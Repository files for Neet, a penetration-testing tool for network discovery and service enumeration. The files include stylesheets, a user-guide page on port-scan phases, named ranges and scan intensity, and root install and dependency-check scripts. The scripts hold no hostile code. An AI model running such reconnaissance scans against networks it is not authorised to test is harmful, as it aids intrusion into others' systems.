.highlight .s2 { color: #d14 } /* Literal.String.Double */
.highlight .se { color: #d14 } /* Literal.String.Escape */
.highlight .sh { color: #d14 } /* Literal.String.Heredoc */
.highlight .si { color: #d14 } /* Literal.String.Interpol */
.highlight .sx { color: #d14 } /* Literal.String.Other */
.highlight .sr { color: #009926 } /* Literal.String.Regex */
.highlight .s1 { color: #d14 } /* Literal.String.Single */
.highlight .ss { color: #990073 } /* Literal.String.Symbol */
.highlight .bp { color: #999999 } /* Name.Builtin.Pseudo */
.highlight .vc { color: #008080 } /* Name.Variable.Class */
.highlight .vg { color: #008080 } /* Name.Variable.Global */
.highlight .vi { color: #008080 } /* Name.Variable.Instance */
.highlight .il { color: #009999 } /* Literal.Number.Integer.Long */

.type-csharp .highlight .k { color: #0000FF }
.type-csharp .highlight .kt { color: #0000FF }
.type-csharp .highlight .nf { color: #000000; font-weight: normal }
.type-csharp .highlight .nc { color: #2B91AF }
.type-csharp .highlight .nn { color: #000000 }
.type-csharp .highlight .s { color: #A31515 }
.type-csharp .highlight .sc { color: #A31515 }

--------------------------------------------------------------------------------
/content/doc/stylesheets/stylesheet-wider.css:
--------------------------------------------------------------------------------
body {
  margin: 0;
  padding: 0;
  background: #151515 url("../images/bkg.png") 0 0;
  color: #eaeaea;
  font: 16px;
  line-height: 1.5;
  font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace;
}

/* General & 'Reset' Stuff */

.container {
  width: 90%;
  max-width: 800px;
  margin: 0 auto;
}

section {
  display: block;
  margin: 0 0 20px 0;
}

h1, h2, h3, h4, h5, h6 {
  margin: 0 0 20px;
}

li {
  line-height: 1.4 ;
}

/* Header,
   header - container
   h1 - project name
   h2 - project description
*/

header {
  background: rgba(0, 0, 0, 0.1);
  width: 100%;
  border-bottom: 1px dashed #b5e853;
  padding: 20px 0;
  margin: 0 0 40px 0;
}

header h1 {
  font-size: 30px;
  line-height: 1.5;
  margin: 0 0 0 -40px;
  font-weight: bold;
  font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace;
  color: #b5e853;
  text-shadow: 0 1px 1px rgba(0, 0, 0, 0.1),
               0 0 5px rgba(181, 232, 83, 0.1),
               0 0 10px rgba(181, 232, 83, 0.1);
  letter-spacing: -1px;
  -webkit-font-smoothing: antialiased;
}

header h1:before {
  content: "./ ";
  font-size: 24px;
}

header h2 {
  font-size: 18px;
  font-weight: 300;
  color: #666;
}

#downloads .btn {
  display: inline-block;
  text-align: center;
  margin: 0;
}

/* Main Content
*/

#main_content {
  width: 100%;
  -webkit-font-smoothing: antialiased;
}
section img {
  max-width: 100%
}

h1, h2, h3, h4, h5, h6 {
  font-weight: normal;
  font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace;
  color: #b5e853;
  letter-spacing: -0.03em;
  text-shadow: 0 1px 1px rgba(0, 0, 0, 0.1),
               0 0 5px rgba(181, 232, 83, 0.1),
               0 0 10px rgba(181, 232, 83, 0.1);
}

#main_content h1 {
  font-size: 30px;
}

#main_content h2 {
  font-size: 24px;
}

#main_content h3 {
  font-size: 18px;
}

#main_content h4 {
  font-size: 14px;
}

#main_content h5 {
  font-size: 12px;
  text-transform: uppercase;
  margin: 0 0 5px 0;
}

#main_content h6 {
  font-size: 12px;
  text-transform: uppercase;
  color: #999;
  margin: 0 0 5px 0;
}

dt {
  font-style: italic;
  font-weight: bold;
}

ul li {
  list-style: none;
}

ul li:before {
  content: ">>";
  font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace;
  font-size: 13px;
  color: #b5e853;
  margin-left: -37px;
  margin-right: 21px;
  line-height: 16px;
}

blockquote {
  color: #aaa;
  padding-left: 10px;
  border-left: 1px dotted #666;
}

pre {
  background: rgba(0, 0, 0, 0.9);
  border: 1px solid rgba(255, 255, 255, 0.15);
  padding: 10px;
  font-size: 14px;
  color: #b5e853;
  border-radius: 2px;
  -moz-border-radius: 2px;
  -webkit-border-radius: 2px;
  text-wrap: normal;
  overflow: auto;
  overflow-y: hidden;
}

table {
  width: 100%;
  margin: 0 0 20px 0;
}

th {
  text-align: left;
  border-bottom: 1px dashed #b5e853;
  padding: 5px 10px;
}

td {
  padding: 5px 10px;
}

hr {
  height: 0;
  border: 0;
  border-bottom: 1px dashed #b5e853;
  color: #b5e853;
}

/* Buttons
*/

.btn {
  display: inline-block;
  background: -webkit-linear-gradient(top, rgba(40, 40, 40, 0.3), rgba(35, 35, 35, 0.3) 50%, rgba(10, 10, 10, 0.3) 50%, rgba(0, 0, 0, 0.3));
  padding: 8px 18px;
  border-radius: 50px;
  border: 2px solid rgba(0, 0, 0, 0.7);
  border-bottom: 2px solid rgba(0, 0, 0, 0.7);
  border-top: 2px solid rgba(0, 0, 0, 1);
  color: rgba(255, 255, 255, 0.8);
  font-family: Helvetica, Arial, sans-serif;
  font-weight: bold;
  font-size: 13px;
  text-decoration: none;
  text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.75);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.05);
}

.btn:hover {
  background: -webkit-linear-gradient(top, rgba(40, 40, 40, 0.6), rgba(35, 35, 35, 0.6) 50%, rgba(10, 10, 10, 0.8) 50%, rgba(0, 0, 0, 0.8));
}

.btn .icon {
  display: inline-block;
  width: 16px;
  height: 16px;
  margin: 1px 8px 0 0;
  float: left;
}

.btn-github .icon {
  opacity: 0.6;
  background: url("../images/blacktocat.png") 0 0 no-repeat;
}

/* Links
   a, a:hover, a:visited
*/

a {
  color: #63c0f5;
  text-shadow: 0 0 5px rgba(104, 182, 255, 0.5);
}

/* Clearfix */

.cf:before, .cf:after {
  content:"";
  display:table;
}

.cf:after {
  clear:both;
}

.cf {
  zoom:1;
}

--------------------------------------------------------------------------------
/content/doc/stylesheets/stylesheet.css:
--------------------------------------------------------------------------------
body {
  margin: 0;
  padding: 0;
  background: #151515 url("../images/bkg.png") 0 0;
  color: #eaeaea;
  font: 16px;
  line-height: 1.5;
  font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace;
}

/* General & 'Reset' Stuff */

.container {
  width: 90%;
  max-width: 600px;
  margin: 0 auto;
}

section {
  display: block;
  margin: 0 0 20px 0;
}

h1, h2, h3, h4, h5, h6 {
  margin: 0 0 20px;
}

li {
  line-height: 1.4 ;
}

/* Header,
   header - container
   h1 - project name
   h2 - project description
*/

header {
  background: rgba(0, 0, 0, 0.1);
  width: 100%;
  border-bottom: 1px dashed #b5e853;
  padding: 20px 0;
  margin: 0 0 40px 0;
}

header h1 {
  font-size: 30px;
  line-height: 1.5;
  margin: 0 0 0 -40px;
  font-weight: bold;
  font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace;
  color: #b5e853;
  text-shadow: 0 1px 1px rgba(0, 0, 0, 0.1),
               0 0 5px rgba(181, 232, 83, 0.1),
               0 0 10px rgba(181, 232, 83, 0.1);
  letter-spacing: -1px;
  -webkit-font-smoothing: antialiased;
}

header h1:before {
  content: "./ ";
  font-size: 24px;
}

header h2 {
  font-size: 18px;
  font-weight: 300;
  color: #666;
}

#downloads .btn {
  display: inline-block;
  text-align: center;
  margin: 0;
}

/* Main Content
*/

#main_content {
  width: 100%;
  -webkit-font-smoothing: antialiased;
}
section img {
  max-width: 100%
}

h1, h2, h3, h4, h5, h6 {
  font-weight: normal;
  font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace;
  color: #b5e853;
  letter-spacing: -0.03em;
  text-shadow: 0 1px 1px rgba(0, 0, 0, 0.1),
               0 0 5px rgba(181, 232, 83, 0.1),
               0 0 10px rgba(181, 232, 83, 0.1);
}

#main_content h1 {
  font-size: 30px;
}

#main_content h2 {
  font-size: 24px;
}

#main_content h3 {
  font-size: 18px;
}

#main_content h4 {
  font-size: 14px;
}

#main_content h5 {
  font-size: 12px;
  text-transform: uppercase;
  margin: 0 0 5px 0;
}

#main_content h6 {
  font-size: 12px;
  text-transform: uppercase;
  color: #999;
  margin: 0 0 5px 0;
}

dt {
  font-style: italic;
  font-weight: bold;
}

ul li {
  list-style: none;
}

ul li:before {
  content: ">>";
  font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace;
  font-size: 13px;
  color: #b5e853;
  margin-left: -37px;
  margin-right: 21px;
  line-height: 16px;
}

blockquote {
  color: #aaa;
  padding-left: 10px;
  border-left: 1px dotted #666;
}

pre {
  background: rgba(0, 0, 0, 0.9);
  border: 1px solid rgba(255, 255, 255, 0.15);
  padding: 10px;
  font-size: 14px;
  color: #b5e853;
  border-radius: 2px;
  -moz-border-radius: 2px;
  -webkit-border-radius: 2px;
  text-wrap: normal;
  overflow: auto;
  overflow-y: hidden;
}

table {
  width: 100%;
  margin: 0 0 20px 0;
}

th {
  text-align: left;
  border-bottom: 1px dashed #b5e853;
  padding: 5px 10px;
}

td {
  padding: 5px 10px;
}

hr {
  height: 0;
  border: 0;
  border-bottom: 1px dashed #b5e853;
  color: #b5e853;
}

/* Buttons
*/

.btn {
  display: inline-block;
  background: -webkit-linear-gradient(top, rgba(40, 40, 40, 0.3), rgba(35, 35, 35, 0.3) 50%, rgba(10, 10, 10, 0.3) 50%, rgba(0, 0, 0, 0.3));
  padding: 8px 18px;
  border-radius: 50px;
  border: 2px solid rgba(0, 0, 0, 0.7);
  border-bottom: 2px solid rgba(0, 0, 0, 0.7);
  border-top: 2px solid rgba(0, 0, 0, 1);
  color: rgba(255, 255, 255, 0.8);
  font-family: Helvetica, Arial, sans-serif;
  font-weight: bold;
  font-size: 13px;
  text-decoration: none;
  text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.75);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.05);
}

.btn:hover {
  background: -webkit-linear-gradient(top, rgba(40, 40, 40, 0.6), rgba(35, 35, 35, 0.6) 50%, rgba(10, 10, 10, 0.8) 50%, rgba(0, 0, 0, 0.8));
}

.btn .icon {
  display: inline-block;
  width: 16px;
  height: 16px;
  margin: 1px 8px 0 0;
  float: left;
}

.btn-github .icon {
  opacity: 0.6;
  background: url("../images/blacktocat.png") 0 0 no-repeat;
}

/* Links
   a, a:hover, a:visited
*/

a {
  color: #63c0f5;
  text-shadow: 0 0 5px rgba(104, 182, 255, 0.5);
}

/* Clearfix */

.cf:before, .cf:after {
  content:"";
  display:table;
}

.cf:after {
  clear:both;
}

.cf {
  zoom:1;
}

--------------------------------------------------------------------------------
/content/doc/terminology.html:
--------------------------------------------------------------------------------
Neet User Guide: Terminology

Neet User Guide

Terminology used in this documentation

Neet Shell

The neet shell is a set of bash aliases which provides a rich set of features for making the most of the results produced by neet. If you are running X windows, a new terminal containing an instance of the neet shell will automatically open when you begin a scan. Apart from that, you can start an instance of a neet shell anytime, by running the neetsh command. The new shell will automatically start in the most recent (or current) results directory, saving you having to navigate there first. The neet shell has a help command, which displays a list of the available commands, together with a brief description of each.

If you wish to have a detailed log of everything that is done inside the neet shell, starting neetsh with the -s or --screen option will start it in a screen session, logging to a file.

Locality

local | remote | internet | vpn

Neet automatically classifies hosts as local, remote or accessed via VPN by examining the kernel's routing table. Additionally, you can specify on the command line if remote hosts should be assumed to be accessed over the Internet. The identified location of the hosts affects the method used for host discovery and also the speed and intensity mappings (see speed and intensity below). VPN links are identified by the naming of the interface through which the affected hosts are accessed. By default, hosts accessed by tapX or tunX interfaces are assumed to be on a VPN link (these names can be changed or added to in the configuration file via the Interface.VPN parameter).

Host Discovery

Local hosts are discovered by ARP, whilst remote hosts are assumed to be UP for the whole test unless the SDM is told (with the -p flag) to use ICMP ECHO to identify live hosts. You can alternatively use the -l option to treat hosts as DOWN if they haven't responded during the named range scans.

Internet hosts are treated the same as remote hosts, except for having their own set of performance mappings in the configuration file. VPN hosts which are on the same subnet as a local VPN interface will be discovered by ARP; those not on the same subnet as a local interface will be treated as remote hosts with VPN performance settings. The ICMP ECHO discovery and Limited Patience methods apply to remote, Internet and VPN hosts, but not to local hosts (i.e. those connected directly to local interfaces). Host discovery is discussed in more detail in the Host Discovery section.

Internet Mode

Neet cannot automatically determine if remote hosts are remote on a large corporate network, or actually located across the Internet. When -I is specified on the command line, neet assumes that all remote hosts are actually Internet-based, and alters the performance of the scan accordingly.

As well as this scan tuning change, the user is prompted to confirm WHOIS lookups on the target address ranges before the scan commences.

Scan Phases

The Service Discovery Module splits the main port scan into a number of chunks or Phases - 10 by default - for example, 1-6554, 6555-13109 and so on.

After scanning each block of ports, the SDM identifies and records any services which are listening on those ports before moving on to the next phase. Splitting the scan like this brings a number of benefits. Firstly, it allows any services residing in the lower ranges to be discovered much more quickly than if service identification waited for the full range to be scanned. Secondly, if a scan is paused, it can be resumed from the phase it was previously scanning, instead of beginning the whole range all over again.

Named Range Scans

Where the full range of 65535 ports is to be scanned, sometimes it can take some time for even the first phase to complete, and this time is not very productive for the pentester. Named ranges are limited ranges of ports which are scanned and analysed by the SDM before the first main phase begins. Named ranges are specified in the configuration file, and are named PortRange.Scan.TCP.NAME or PortRange.Scan.UDP.NAME, where NAME is an identifier for that port range. The named ranges are scanned in the order in which they appear in the configuration file. For example, the Windows named range is specified as "PortRange.Scan.TCP.Windows=111,135,139,445" in the configuration file, and is the very first range to be scanned and analysed by neet, providing very fast identification of Windows from non-Windows hosts. You are free to add your own named ranges, or to modify the default ones to quickly identify key services. Ports which are scanned as part of a named range are automatically excluded from later scans of the same protocol, so services will not go through the identification process twice.
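How named ranges and scan phases fit together, as an added example that is not neet's own code: named ranges are read in file order and scanned first, and their ports are then left out of the main phases. The function names, the Web and Infra entries in the sample configuration and the fixed phase width (chosen so that the first two phases match the 1-6554 and 6555-13109 boundaries quoted above) are assumptions.

```python
"""Plan named-range scans and main phases (added illustration, not neet code)."""

MAX_PORT = 65535
# Assumption: a fixed block width that reproduces the phase boundaries quoted
# in the guide; neet's real splitting code is not shown on this page.
PHASE_WIDTH = 6555

# Constructed configuration; only the Windows line appears in the guide.
SAMPLE_CONF = """\
PortRange.Scan.TCP.Windows=111,135,139,445
PortRange.Scan.TCP.Web=80,443,8080
PortRange.Scan.UDP.Infra=53,161
"""


def parse_named_ranges(conf_text, proto="TCP"):
    """Return [(name, [ports])] for one protocol, in configuration-file order."""
    prefix = f"PortRange.Scan.{proto}."
    ranges = []
    for line in conf_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if not sep or not key.startswith(prefix):
            continue
        ports = [int(item) for item in value.split(",")]
        if any(not 1 <= p <= MAX_PORT for p in ports):
            raise ValueError(f"port out of range in {key}")
        ranges.append((key[len(prefix):], ports))
    return ranges


def plan_scan(conf_text, proto="TCP"):
    """Return the ordered work list: named ranges first, then the main phases."""
    plan, done = [], set()
    for name, ports in parse_named_ranges(conf_text, proto):
        fresh = [p for p in ports if p not in done]   # a port listed twice is scanned once
        done.update(fresh)
        plan.append((name, fresh))
    for k, lo in enumerate(range(0, MAX_PORT + 1, PHASE_WIDTH), start=1):
        first, last = max(lo, 1), min(lo + PHASE_WIDTH - 1, MAX_PORT)
        # Ports already covered by a named range are excluded from the phase.
        remaining = [p for p in range(first, last + 1) if p not in done]
        plan.append((f"phase{k} {first}-{last}", remaining))
    return plan


def resume_from(plan, last_completed):
    """Return the steps still to run after the step labelled last_completed."""
    labels = [label for label, _ in plan]
    return plan[labels.index(last_completed) + 1:]


if __name__ == "__main__":
    for label, ports in plan_scan(SAMPLE_CONF):
        print(f"{label:22} {len(ports):5} ports")
```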

SDM - Service Discovery Module.

There is only one SDM, and it is responsible for discovering hosts and identifying services. It is multi-threaded, and so can test multiple IP addresses at once. When you specify a number of threads on the command line (or in the configuration file), it is the number of SDM threads that you are specifying. The SDM simply discovers services and writes them to files in the services directory. It can also note issues which can be spotted from the process of identifying services - support for SSH protocol 1 for instance. It does not do any testing of the services.

GSM - Global Service Monitors

GSMs are what make neet extensible - each is a module which performs a specific check. For example, the SMTP Global Service Monitor is only interested in checking SMTP servers, and knows how to do nothing else. These modules are also multi-threaded and can check more than one instance of a service at once. The term Global refers to the fact that the module is interested in all instances of the service which it is monitoring, regardless of where they are in terms of host, protocol and port.

Scan Intensity

The specified scan intensity is an indication of how aggressively the SDM should probe services in its attempts to identify them. The setting maps to a variety of intensity settings which apply mostly to the amap and nmap tools. The mappings are all contained in the configuration file, and can be changed depending on your experiences. The default settings have been tried and found suitable in the environments in which neet has been tested to date, but they may not suit all use cases. The individual intensity mappings for a given nominal setting (eg light) will vary depending on the relative location of the host - local, remote etc.

Scan Speed

The specified scan speed is an indication of how rapidly the scan should progress, and maps to a variety of speed, timeout and retry settings which apply to a large number of the tools used by neet. The mappings are all contained in the configuration file, and can be changed depending on your experiences. The default settings have been tried and found suitable in the environments in which neet has been tested to date, but they may not suit all use cases. The individual speed mappings for a given nominal setting (eg fast) will vary depending on the relative location of the host - local, remote etc.

79 | 80 |
81 |
82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /content/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | export VERSION=`cat VERSION` 26 | export PREFIX=/opt 27 | 28 | if [ ! -z $INVOKEDBYNEETUPDATE ] && [ $INVOKEDBYNEETUPDATE -eq 1 ]; then 29 | #echo "neet core installer invoked by neet-update. Performing quick install only." 30 | install/coreinstall.sh 31 | exit $? 32 | fi 33 | 34 | if [ `id -u` -ne 0 ]; then 35 | echo "You must be root to install Neet." 36 | exit 1 37 | fi 38 | 39 | if [ ! -d install ] || [ ! -d doc ] || [ ! -d main ] || [ ! -f install/installsupport ]; then 40 | echo "You must run this script from the topmost install directory." 41 | exit 1 42 | fi 43 | 44 | 45 | echo 46 | echo "Neet Discovery Engine v${VERSION} - Installing..." 
47 | echo 48 | cat << EOF 49 | Copyright (C) 2008-2016 Jonathan Roach 50 | This program comes with ABSOLUTELY NO WARRANTY 51 | This is free software, and you are welcome to redistribute it 52 | under certain conditions; view the accompanying LICENSE for details. 53 | EOF 54 | 55 | export NEETINSTALLER=1 56 | export UPDATEONLY=0 57 | export NEET="${PREFIX}/neet" 58 | export CONFDIR="${NEET}/etc" 59 | export CONFIG="${CONFDIR}/neet.conf" 60 | export INST="$PWD" 61 | 62 | # Import some functions 63 | . ./install/installsupport 64 | 65 | [ -f install/error ] && rm install/error 66 | 67 | # Is this a virgin install? 68 | if [ -f ${NEET}/core/installsupport ]; then 69 | cat << EOM 70 | 71 | ** IMPORTANT ** 72 | 73 | You are running the full installer, but outdated components can be 74 | updated more efficiently by periodically running neet-update. This 75 | installer will remove the existing neet installation and re-install 76 | it from scratch. 77 | 78 | If this is what you want type YES, otherwise I will run neet-update 79 | for you and update only the components which require updating. 80 | 81 | If you want to exit the installer without changing anything, type 82 | "exit" (without the quotes). 83 | 84 | >> If you just hit ENTER or type anything other than exit or YES, 85 | then I will run neet-update. 86 | 87 | EOM 88 | read result 89 | if [ ! -z $result ]; then 90 | if [ "$result" == "exit" ]; then 91 | exit 0 92 | elif [ "$result" == "YES" ]; then 93 | UPDATEONLY=0 94 | else 95 | UPDATEONLY=1 96 | fi 97 | else 98 | UPDATEONLY=1 99 | fi 100 | fi 101 | 102 | if [ $UPDATEONLY -eq 1 ]; then 103 | echo "Running neet-update...." 104 | "${NEET}/bin/neet-update" 105 | exit 0 106 | fi 107 | 108 | # This is the main installation process, not just an update. 109 | # If we can, download any dependencies from the distro repo. 110 | selectDistro 111 | echo 112 | 113 | if [ ! 
-z $DISTRO ] && [ -f "install/pkg/$DISTRO" ]; then
    # Best case - we know exactly what it is
    echo " Installing pre-requisites for $DISTRO"
    apt-get-list "install/pkg/$DISTRO"

elif [ ! -z "$FALLBACK" ] && [ -f "install/pkg/$FALLBACK" ]; then
    # Second-best case - we don't have a definitive list
    # of pre-requisites but we have a reasonable idea.
    echo " Couldn't determine your exact distribution."
    echo " Using pre-requisite listing for $FALLBACK instead."
    apt-get-list "install/pkg/$FALLBACK"

else
    # We really have no idea
    echo " Couldn't determine your distribution. You'll have to find any missing"
    echo " dependencies yourself."
fi

# Check the build environment

for build in gcc ld make; do
    if ! systemHas $build; then
        echo
        echo "** Your system doesn't appear to include a working software build environment, which"
        echo " is required for neet installation. What kind of pentester doesn't have a build"
        echo " environment? Debian/Ubuntu users are advised to install the gcc, make, autoconf,"
        echo " automake, flex and bison packages. Fedora and Mandrake users are advised to"
        echo " upgrade to a decent distribution. Gentoo and Arch users should never, ever read this."
        echo
        touch install/error
        exit 1
    fi
done

# Check the base dependencies
echo
echo "Checking that your system has the required dependencies..."
echo
cd install/
./checkdeps.pl
ERROR=$?
cd "$INST"
[ -f install/dependencyErrors.log ] && mv install/dependencyErrors.log .
echo
if [ $ERROR -eq 2 ]; then
    echo "Unmet critical dependencies. Will not continue installing."
    echo "See the following log file: dependencyErrors.log"
    touch install/error
    exit 2
fi

# Clean up existing installation first
. ./uninstall.sh

echo "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Installing the Neet Discovery Engine to ${NEET}..."

install/coreinstall.sh

cd "$INST"

####################################

# Now invoke neet-update to install the rest of the packages
"${NEET}/bin/neet-update"

# Ensure that the location information is up to date
"${NEET}/bin/updateLocations"

# Finally, set up the file permissions
# (owner:group form; the older owner.group spelling is deprecated)
chown -R root:root "$NEET"
chmod -R go-w "$NEET"
chmod -R +X "$NEET"
chmod 755 "${NEET}"/bin/*

####################################
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo

echo "Neet $VERSION has been installed."

MISSING=""
WARN=0
for component in modules resources deps shell upload bundled; do
    if ! grep "neet-${component}=" "${CONFDIR}/versions" >/dev/null 2>&1; then
        WARN=1
        MISSING="$MISSING $component"
    fi
done

if [ $WARN -eq 1 ]; then
cat << EOM

== WARNING ==
One or more critical components were not installed. This could happen if you
currently have no Internet access, or if the proxy is not set up correctly to
retrieve content from GitHub. To correct this, please check your connectivity
and then run neet-update.

The following components were missing:

EOM
    for component in $MISSING; do
        echo " - neet-$component"
    done
fi

cat << EOF

Thank you for installing Neet. Please review the man pages and the HTML
documentation supplied in the doc directory to find out how to get the best
from it.

EOF

--------------------------------------------------------------------------------
/content/install/checkdeps.pl:
--------------------------------------------------------------------------------
#!/usr/bin/perl -w

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################
use strict;
unshift @INC, ('.');
require checkdeps;

# This script checks the dependencies prior to the installation of neet
my @locations;

readDependencies();
unlink "dependencyErrors.log";

my (@criticals,@nonrecs,$missing);
my $error=0;

for my $component (listExecutableComponents()){
    my ($result,$path)=checkExecutableComponent($component);
    my ($executable,$fullpath);
    if ($path){
        $executable=getParam($component,"executable");
        $fullpath="$path/$executable";
    }
    if ($result==2){
        push @criticals, $component;
    } elsif ($result==1){
        push @nonrecs, $component;
        push @locations, "$executable=$fullpath\n" if (!isMissing($component));
    } else {
        push @locations, "$executable=$fullpath\n" if (!isMissing($component));

    }
}

for my $c (@nonrecs){
    my $message=getMessage($c,"recommended");
    my $download=getParam($c,"download");
    if ($download){
        $message .= "\n $c can be downloaded from the following URI:\n $download\n";
    }
    if (!isMissing($c)){
        errorLog ("*-------------------------------------------------------------------------*\n" .
            " Dependency \"$c\" version " . actualVersion($c) . " was found, but it really should be at least\n" .
            " version " . recommendedVersion($c) . ".\n\n" . $message .
            "*-------------------------------------------------------------------------*\n\n");
    } else {
        errorLog ("*-------------------------------------------------------------------------*\n" .
            " Non-critical dependency \"$c\" could not be found.\n\n" . $message .
            "*-------------------------------------------------------------------------*\n\n");
    }
    $error=1;
}
for my $c (@criticals){
    my $message=getMessage($c,"critical");
    if (index($message,"No help text")==1){
        $message=getMessage($c,"recommended");
    }
    my $download=getParam($c,"download");
    if ($download){
        $message .= "\n $c can be downloaded from the following URI:\n $download\n";
    }
    if (!isMissing($c)){
        errorLog ("*!!!!---------------------------------------------------------------!!!!*\n" .
            " Critical dependency: \"$c\", minimum version " . criticalVersion($c) . ", could not be found.\n" .
            " The most recent version which could be found was version " . actualVersion($c) . ".\n\n" . $message .
            "*-------------------------------------------------------------------------*\n");
    } else {
        errorLog ("*!!!!---------------------------------------------------------------!!!!*\n\n" .
            " Critical missing dependency: \"$c\" could not be found.\n\n" . $message .
            "*-------------------------------------------------------------------------*\n\n");
    }
    $error=2;
}

if ($error < 2){
    unlink "locations";
    if (open(LOC,">locations")){
        print LOC @locations;
        close LOC;
    }
}

# Now check the PERL kit
$#criticals=-1; $#nonrecs=-1;

for my $component (listPerlComponents()){
    my $result=checkPerlComponent($component);
    if (!$result){
        if (getParam($component,"critical")){
            my $message=getMessage($component,"critical");
            if (index($message,"No help text")==1){
                $message=getMessage($component,"recommended");
            }
            errorLog ("*!!!!---------------------------------------------------------------!!!!*\n\n" .
                " Critical missing PERL dependency: \"$component\" could not be found.\n\n" . $message .
                "*-------------------------------------------------------------------------*\n\n");
            $error=2;
        } else {
            my $message=getMessage($component,"recommended");
            errorLog ("*-------------------------------------------------------------------------*\n" .
                " Non-critical PERL library dependency \"$component\" could not be found.\n\n" . $message .
                "*-------------------------------------------------------------------------*\n\n");
            $error=1 if ($error==0);
        }
    }
}

exit $error;

--------------------------------------------------------------------------------
/content/install/coreinstall.sh:
--------------------------------------------------------------------------------
#!/bin/bash

##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################


# This program does the installation of the neet core. It should only be
# invoked by the neet installer or neet-update.

if [ -z "$NEETINSTALLER" ] && [ -z "$INVOKEDBYNEETUPDATE" ]; then
    echo "This script should NOT be invoked manually! Leave it alone!"
    exit 1
fi

. ./install/installsupport

# Base permissions
umask 022

for directory in bin etc pkg/bin doc core/update/build; do
    mkdir -p "${NEET}/$directory"
done

if [ ! -d "${NEET}/bin" ]; then
    echo "Couldn't create the Neet home directory ${NEET}. Quitting."
    touch install/error
    exit 1
fi

# Config information
cp install/installsupport install/githubVersion "${NEET}/core/"

cd main

for subdir in bin etc; do
    cp -R "${subdir}" "${NEET}/"
done

# Perl modules
cp -R JR Neet "${NEET}/core/"

# Now, set up links to the directories in the main $PATH
for bin in neet neet-update; do
    ln -sf "${NEET}/bin/${bin}" "/usr/bin/${bin}" 2>/dev/null
done

# Somewhere for the documentation to go
cp -R ../doc/* "${NEET}/doc/"

# Now the man pages
MANIN=0
if [ -f /etc/manpath.config ]; then
    for path in `grep ^MANDATORY_MANPATH /etc/manpath.config | grep /usr/local/ | awk '{print $2}'`; do
        if [ -d "$path/man1/" ]; then
            cp man/*.gz "${path}/man1/"
            MANIN=1
            MANPATH=$path
            break
        fi
    done
else
    for path in `echo $MANPATH | sed -e 's/:/ /g'`; do
        if [ -d "$path/man1" ]; then
            cp man/*.gz "${path}/man1/"
            MANIN=1
            MANPATH=$path
            break
        fi
    done
fi
if [ $MANIN -eq 0 ]; then
    # Force install
    path=/usr/share/man
    mkdir -p /usr/share/man/man1
    cp man/*.gz ${path}/man1/
    [ $? -eq 0 ] && MANIN=1 && MANPATH=$path
fi

if [ $MANIN -eq 1 ]; then
    echo "Man pages have been installed into $MANPATH/man1"
fi

newVersion neet $VERSION
# Ensure that the location information is up to date
"${NEET}/bin/updateLocations"

# Owner:group form; the older owner.group spelling is deprecated
chown -R root:root "$NEET"
chmod -R go-w "$NEET"
chmod -R +X "$NEET"
chmod 755 "${NEET}"/bin/*

--------------------------------------------------------------------------------
/content/install/dependencies.conf:
--------------------------------------------------------------------------------
# This file contains details of the dependencies needed to install
# Neet. It is intended to be human readable, as well as
# machine parseable, so that you can check the dependencies yourself
# first, if you so wish.

# Executables

component: Nmap
executable: nmap
versioncommand: nmap --version
download: http://nmap.org/download.html
versionformat: \d+\.\d+\d+
likelypaths: /usr/local/bin:/usr/bin
recommended: 5.0
critical: 4.2

# Will build this anyway
#component: Amap
#executable: amap
#download: http://freeworld.thc.org/releases.php?s=4&q=&o=
#versioncommand: amap | grep Hauser
#versionformat: \d+\.\d+
#likelypaths: /usr/local/bin:/usr/bin
#recommended: 5.2

